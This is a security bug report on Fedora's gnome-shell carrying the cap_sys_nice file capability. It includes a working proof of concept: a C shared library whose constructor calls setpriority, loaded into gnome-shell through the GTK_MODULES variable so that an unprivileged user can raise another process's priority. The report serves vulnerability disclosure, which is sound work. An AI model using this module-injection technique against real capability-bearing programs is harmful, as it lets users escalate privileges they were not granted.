fedora: gnome not using fscaps safely I happened to notice a minor issue while working a tool I'm writing, I'm not sure if gnome or the fedora package is to blame, but it seems gnome-shell is now given cap_sys_nice: $ rpm -qf /bin/gnome-shell gnome-shell-3.38.4-1.fc33.x86_64 $ getcap /bin/gnome-shell /bin/gnome-shell cap_sys_nice=ep This seems incorrect. Here is a demo, I'm just a regular user, and this pid has a priority of 0: $ ps -heo nice -q 495980 0 I don't have permission to raise that: $ renice -n -20 495980 renice: failed to set priority for 495980 (process ID): Permission denied But it doesn't matter, I can just make gnome do it: $ cat prio.c #include #include #include void __attribute__((constructor)) init() { setpriority(PRIO_PROCESS, 495980, -20); _exit(0); } $ gcc -fPIC -shared -o prio.so prio.c $ env GTK_MODULES=/proc/self/cwd/prio.so /bin/gnome-shell --list-modes And if I look at the priority now... $ ps -heo nice -q 495980 -20 This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is YYYY-MM-DD. Disclosure at an earlier date is possible if agreed upon by all parties. Found by: taviso@google.com